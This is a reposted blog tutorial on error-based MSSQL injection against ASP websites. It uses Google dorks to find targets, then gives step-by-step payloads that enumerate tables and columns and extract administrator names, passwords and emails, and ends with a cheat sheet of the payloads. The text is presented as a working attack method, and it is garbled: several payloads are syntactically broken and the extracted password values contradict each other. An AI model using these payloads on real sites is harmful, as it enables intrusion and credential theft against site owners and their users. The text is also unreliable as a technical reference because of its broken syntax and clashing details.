Posts Subscribe to Revolution ChurchComments

Sunday, 21 August 2011

My SQL injection, method of attack!

03:42 Posted by : Unknown
Labels: , ,

MSSQL - injection, method of attack!
###########################


1.1 Introduction 
1.2 How to ask Vulnerability page? 
1.3 How to prove that the site of weakness? 
1.4 How to find version / name of the DB? 
1.5 How to discover the names table (table_name)? 
1.6 How to discover the names of column (column_name)? 
1.7 How to get data from tables that interest us (eg name, pass, email, etc.)? 
1.8 Conclusion?





[1.1 Introduction] 
############


This lesson will try to explain that you already know the different techniques, MSSQL-injection. 
Who will have the opportunity to learn how this method is used as a favorite act to obtain information (name, password and login) or various other information through this technique. 
MSSQL-injection, can be used for products that are created by well-known company Microsoft. 
This type of injection, then deal with those sites that are coded in ASP / Aspks etc. 


There are several types of attacks in this way: 


* - Normal MSSQL SQL Injection attacks 
* - MSSQL injection in Web services (SOAP injection) 
* - Union with MSSQL injection attack 
* - ODBC error attack the "Convert" 
* - MSSQL Blind SQL Injection attacks, etc. .. 


For this will be used for writing this type of attack: 


"Attack of the ODBC error message" Convert "




[1.2 How to ask Vulnerability page? ] 
############################


How to ask who Vulnerability page is easy. This can use Google services company giant. 


Let's open: Only the registered members can see the link. Register here 


I write, for example: inurl: "products". "ID" 
inurl: "neus.asp" menu " 
inurl: "content.asp" under " 
inurl: "games.asp" ID " 
ETC ....( I decided some examples, you can now use the logic, for better dorks)


[1.3 How to prove that the site of weakness? ] 
##################################


So we can understand very easily by adding the following ID page of high comma (,). 
And in case that gives us the answer we found no error page means Vulnerability example: 


++++++++++++++++++++++++++++++++++++++ 
/ Microsoft Access ODBC driver / 
++++++++++++++++++++++++++++++++++++++ 
/ Open quotation / 
++++++++++++++++++++++++++++++++++++++ 
/ Microsoft Amos DB provider for Oracle / 
++++++++++++++++++++++++++++++++++++++ 
/ Division by zero in / 
++++++++++++++++++++++++++++++++++++++ 


These are some of the most common response is shown pages that are weaknesses in the MSSQL - injection. 


Should now act as an example here, and where to put high ( '). 




For example:


-------------------------------------- 
Only the registered members can see the link. Register here / news.asp? id = 100 ' 
-------------------------------------- 


Now we can say that the error is displayed: 


++++++++++++++++++++++++++++++++++++++++++++++++++ +++++++++++++++++++++++++++++++++++ 
Microsoft Amos DB Provider for SQL Server error '80040e14 ' 


Open quotation mark after the character string ") AND (Volgorde> 0) ORDER BY Volgorde '. 


/ MSN / shared / includes / main_rub.asp, Line 4 
++++++++++++++++++++++++++++++++++++++++++++++++++ +++++++++++++++++++++++++++++++++++ 


This page has weaknesses!




[1.4 How to find version 2.4 / DB name? ] 
############################




Let the example easier to understand: 


Version: 


-------------------------------------------------- ------------------ 
Only the registered members can see the link. Register here / news.asp? id = 100 + or +1 = convert (int (@ @ version)) -- 
-------------------------------------------------- ------------------ 




And we have presented an example: 


++++++++++++++++++++++++++++++++++++++++++++++++++ +++++++++++++++++++ 
Microsoft Amos DB Provider for SQL Server error '80040e07 ' 


Conversion failed when converting nvarchar value 'MS SQL Server 2008 (SP1) - 10.0.2531.0 (64) 29. March 2009 10:11:52 Copyright (c) 1988-2008 Microsoft Corporation Edition (64-bit), the operating systems Windows NT 6.0 <x64> (Build 6002: Service Pack 2) (SM), a data type Int. 


/ MSN / shared / includes / main_rub.asp, Line 4 
++++++++++++++++++++++++++++++++++++++++++++++++++ +++++++++++++++++++ 






Now go find DB_Name: 


-------------------------------------------------- ------------------- 
Only the registered members can see the link. Register here /news.asp? id = 100 + or +1 = convert (int (DB_Name ()))-- 
-------------------------------------------------- ------------------- 


eg. 




++++++++++++++++++++++++++++++++++++++++++++++++++ ++++++++++++++++++++++ 
Microsoft Amos DB Provider for SQL Server error '80040e07 ' 


Conversion is not EVILZONE_CREW_DB when converting nvarchar value 'to data type int. 


/ MSN / shared / includes / main_rub.asp, Line 4 
++++++++++++++++++++++++++++++++++++++++++++++++++ ++++++++++++++++++++++


[1.5 How to discover the names table (table_name)] 
######################################




Because it is discovered, or simply to find the side of the table goes through this method. 


For example: 


-------------------------------------------------- -------------------------------------------------- -------------- 
Only the registered members can see the link. Register here / news.asp? id = 100 + or +1 = convert (int (select top 1 table_name from information_schema.tables)) -- 
-------------------------------------------------- -------------------------------------------------- -------------- 




And now there will be a mistake, such as: 


++++++++++++++++++++++++++++++++++++++++++++++++++ +++++++++++++++++++++++++++++++++++ 
Microsoft Amos DB Provider for SQL Server error '80040e07 ' 


Conversion is when converting nvarchar value of users' data on the type Int. 


/ MSN / shared / includes / main_rub.asp, Line 4 
++++++++++++++++++++++++++++++++++++++++++++++++++ +++++++++++++++++++++++++++++++++++ 




That is, in this case the table (table_name) The first is the 'Users', now find the following table: 


For example: 


-------------------------------------------------- -------------------------------------------------- ------------------------------------------------ 
Only the registered members can see the link. Register here / news.asp? id = 100 + or +1 = convert (int (select top 1 table_name from table_name where information_schema.tables not ( 'Users')))-- 
-------------------------------------------------- -------------------------------------------------- ------------------------------------------------ 




And now an error message will appear the same and will give another table: 


++++++++++++++++++++++++++++++++++++++++++++++++++ +++++++++++++++++++++++++++++++++++ 
Microsoft Amos DB Provider for SQL Server error '80040e07 ' 


Conversion is not news when converting nvarchar value 'to data type int. 


/ MSN / shared / includes / main_rub.asp, Line 4 
++++++++++++++++++++++++++++++++++++++++++++++++++ +++++++++++++++++++++++++++++++++++ 


Another table in this case is 'news' 


Now to find the table (table_name) third goes like this: 


For example: 




-------------------------------------------------- -------------------------------------------------- -------------------------------------------------- --------- 
Only the registered members can see the link. Register here / news.asp? id = 100 + or +1 = convert (int (select top 1 table_name from table_name where information_schema.tables not ( 'Users',' news')))-- 
-------------------------------------------------- -------------------------------------------------- -------------------------------------------------- --------- 




I appear to us the third table: 




++++++++++++++++++++++++++++++++++++++++++++++++++ +++++++++++++++++++++++++++++++++++ 
Microsoft Amos DB Provider for SQL Server error '80040e07 ' 


Conversion is when converting nvarchar value categories' of data type int. 


/ MSN / shared / includes / main_rub.asp, Line 4 
++++++++++++++++++++++++++++++++++++++++++++++++++ +++++++++++++++++++++++++++++++++++ 




Then the third table 'categories', and so on until you find all the tables. 


For example: 




-------------------------------------------------- -------------------------------------------------- -------------------------------------------------- ------------------
Only the registered members can see the link. Register here / news.asp? id = 100 + or +1 = convert (int (select top 1 table_name from table_name where information_schema.tables not ( 'Users', 'news', 'Categories'))) -- 
-------------------------------------------------- -------------------------------------------------- -------------------------------------------------- ------------------


[1.6 How to discover the names of column (column_name)] 
###########################################


-If you want to column_name for users as' go: 


For example: 




-------------------------------------------------- -------------------------------------------------- ----------------------------------------- 
Only the registered members can see the link. Register here / news.asp? id = 100 + or +1 = convert (int (select top 1 column_name from information_schema.columns where table_name = 'users'))-- 
-------------------------------------------------- -------------------------------------------------- ----------------------------------------- 
++++++++++++++++++++++++++++++++++++++++++++++++++ +++++++++++++++++++++++++++++++++++ 
Microsoft Amos DB Provider for SQL Server error '80040e07 ' 


Conversion failed when converting nvarchar value 'Name' to data type int. 


/ MSN / shared / includes / main_rub.asp, Line 4 
++++++++++++++++++++++++++++++++++++++++++++++++++ +++++++++++++++++++++++++++++++++++ 


So colums name for the table (table_name) 'Users' the 'name' 


Now find the column (column_name) other at the same table 'Users': 


For example: 




-------------------------------------------------- -------------------------------------------------- -------------------------------------------------- ------------------
Only the registered members can see the link. Register here / news.asp? id = 100 + or +1 = convert (int (select top 1 column_name from information_schema.columns where table_name = 'users' and column_name (' name')))-- 
-------------------------------------------------- -------------------------------------------------- -------------------------------------------------- -------------------------- 
++++++++++++++++++++++++++++++++++++++++++++++++++ +++++++++++++++++++++++++++++++++++ 
Microsoft Amos DB Provider for SQL Server error '80040e07 ' 


Conversion is not a password when converting nvarchar value 'to data type int. 


/ MSN / shared / includes / main_rub.asp, Line 4 
++++++++++++++++++++++++++++++++++++++++++++++++++ +++++++++++++++++++++++++++++++++++ 




columnes name (column_name) the other is 'password', now go find a rotating column_name: 


For example: 


-------------------------------------------------- -------------------------------------------------- -------------------------------------------------- ------------------
Only the registered members can see the link. Register here / news.asp? id = 100 + or +1 = convert (int (select top 1 column_name from information_schema.columns where table_name = 'users' and column_name ( 'name', 'password'))) -- 
-------------------------------------------------- -------------------------------------------------- -------------------------------------------------- --------------------------------------- 
++++++++++++++++++++++++++++++++++++++++++++++++++ +++++++++++++++++++++++++++++++++++ 
Microsoft Amos DB Provider for SQL Server error '80040e07 ' 


Conversion failed when converting nvarchar value 'emailaddress' to data type int. 


/ MSN / shared / includes / main_rub.asp, Line 4 
++++++++++++++++++++++++++++++++++++++++++++++++++ +++++++++++++++++++++++++++++++++++ 


Therefore, the third Colum_name 'emailaddress' and so on and on until the end, to find all of the columns (column_name)!






[1.7 How to get data that interest you (our user name, pass, email, etc.)] 
################################################## ###




To do so you do not have anything to ndyshe we mentioned before. 
In this section, all that needs to be done is to table (table_name), and the names of column (column_name) in their earlier results found. 


In this section will be used: 
Table_name = Users 
Column_name = user name, password, emailaddress! 


Some have now replaced the example: 




-------------------------------------------------- ----------------------------------------- 
Only the registered members can see the link. Register here / news.asp? id = 100 + or +1 = convert (int (select top 1 name from Users)) -- 
-------------------------------------------------- ----------------------------------------- 
++++++++++++++++++++++++++++++++++++++++++++++++++ +++++++++++++++++++++++++++++++++++ 
Microsoft Amos DB Provider for SQL Server error '80040e07 ' 


Conversion is not an administrator when converting nvarchar value 'to data type int. 


/ MSN / shared / includes / main_rub.asp, Line 4 
++++++++++++++++++++++++++++++++++++++++++++++++++ +++++++++++++++++++++++++++++++++++ 


user name : Administrator 


Replacing now the first column "Name" in the second column "password": 


For example: 




-------------------------------------------------- ----------------------------------------- 
Only the registered members can see the link. Register here / news.asp? id = 100 + or +1 = convert (int (select top password from the user 1)) -- 
-------------------------------------------------- ----------------------------------------- 


++++++++++++++++++++++++++++++++++++++++++++++++++ +++++++++++++++++++++++++++++++++++ 
Microsoft Amos DB Provider for SQL Server error '80040e07 ' 


Conversion failed when converting nvarchar value '123456 'to data type int. 


/ MSN / shared / includes / main_rub.asp, Line 4 
++++++++++++++++++++++++++++++++++++++++++++++++++ +++++++++++++++++++++++++++++++++++ 




password: administratorpassword123


Now, instead of rotating columns works the same as above: 


For example: 




-------------------------------------------------- --------------------------------------------- 
Only the registered members can see the link. Register here / news.asp? id = 100 + or +1 = convert (int (select top 1 from users emailaddress)) -- 
-------------------------------------------------- --------------------------------------------- 


emailaddress: Only the registered members can see the link. Register here


Here then we have achieved some info on, and the name / pass and emailaddress page.


user name: Administrator 
password: administratorpassword123 
emailaddress: [email]king.cyborg@yahoo.com/email]


[ 1.8 Conclusion ]
############


================================================== ===========================
Only the registered members can see the link. Register here'
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
Only the registered members can see the link. Register here
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
Only the registered members can see the link. Register here
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
Only the registered members can see the link. Register here top 1 table_name from information_schema.tables))--
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
Only the registered members can see the link. Register here top 1 table_name from information_schema.tables where table_name not in ('Users')))--
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
Only the registered members can see the link. Register here top 1 table_name from information_schema.tables where table_name not in ('Users' , 'members')))--
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
Only the registered members can see the link. Register here top 1 table_name from information_schema.tables where table_name not in ('Users' , 'members' , 'categories')))--
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
Only the registered members can see the link. Register here top 1 column_name from information_schema.columns where table_name='Users'))--
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
Only the registered members can see the link. Register here top 1 column_name from information_schema.columns where table_name='Users' and column_name not in ('username')))--
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
Only the registered members can see the link. Register here top 1 column_name from information_schema.columns where table_name='Users' and column_name not in ('username' , 'password')))--
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
Only the registered members can see the link. Register here top 1 username from Users))--
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
Only the registered members can see the link. Register here top 1 password from Users))--
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
Only the registered members can see the link. Register here top 1 emailaddress from Users))--
================================================== ===========================


NOTE: This Tut Is Not Written By Me !

0 comments:

Post a Comment

Subscribe to: Post Comments (Atom)

Our Partners

Advertisement

Visitors

 

Copyright 2008 All Rights Reserved Revolution Two Church theme by Brian Gardner Converted into Blogger Template by Bloganol dot com